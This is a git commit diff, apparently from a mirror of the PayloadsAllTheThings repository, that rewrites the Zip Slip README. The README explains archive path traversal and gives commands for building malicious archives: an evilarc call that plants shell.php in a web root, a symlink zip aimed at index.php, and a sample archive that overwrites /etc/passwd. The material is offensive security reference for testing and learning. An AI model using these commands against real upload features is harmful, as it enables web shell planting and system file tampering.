gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-12 15:49:38 -08:00
Code Issues Packages Projects Releases Wiki Activity

XPATH + XSS + XXE + XSLT

Browse Source
This commit is contained in:
Swissky
2024-11-30 21:14:51 +01:00
parent 8c09568cb2
commit 32d9f7550d
15 changed files with 235 additions and 201 deletions
Download Patch File Download Diff File Expand all files Collapse all files

42
Zip Slip/README.md
View File

@@ -6,39 +6,45 @@
* [Tools](#tools)
* [Methodology](#methodology)
* [Detection](#detection)
* [Basic Exploit](#basic-exploit)
* [Additional Notes](#additional-notes)
* [Additional Notes](#additional-notes)
* [References](#references)
## Tools
* [ptoomey3/evilarc](https://github.com/ptoomey3/evilarc) - Create tar/zip archives that can exploit directory traversal vulnerabilities
* [usdAG/slipit](https://github.com/usdAG/slipit) - Utility for creating ZipSlip archives
## Methodology
### Detection
The Zip Slip vulnerability is a critical security flaw that affects the handling of archive files, such as ZIP, TAR, or other compressed file formats. This vulnerability allows an attacker to write arbitrary files outside of the intended extraction directory, potentially overwriting critical system files, executing malicious code, or gaining unauthorized access to sensitive information.
Any ZIP upload page on the application.
**Example**: Suppose an attacker creates a ZIP file with the following structure:
### Basic Exploit
Using [ptoomey3/evilarc](https://github.com/ptoomey3/evilarc):
```python
python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
```
malicious.zip
├── ../../../../etc/passwd
├── ../../../../usr/local/bin/malicious_script.sh
```
Creating a ZIP archive containing a symbolic link:
When a vulnerable application extracts `malicious.zip`, the files are written to `/etc/passwd` and /`usr/local/bin/malicious_script.sh` instead of being contained within the extraction directory. This can have severe consequences, such as corrupting system files or executing malicious scripts.
```ps1
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
```
### Additional Notes
* Using [ptoomey3/evilarc](https://github.com/ptoomey3/evilarc):
```python
python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
```
* Creating a ZIP archive containing a symbolic link:
```ps1
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
```
For a list of affected libraries and projects, visit [snyk/zip-slip-vulnerability](https://github.com/snyk/zip-slip-vulnerability)
For affected libraries and projects, visit [snyk/zip-slip-vulnerability](https://github.com/snyk/zip-slip-vulnerability)
## References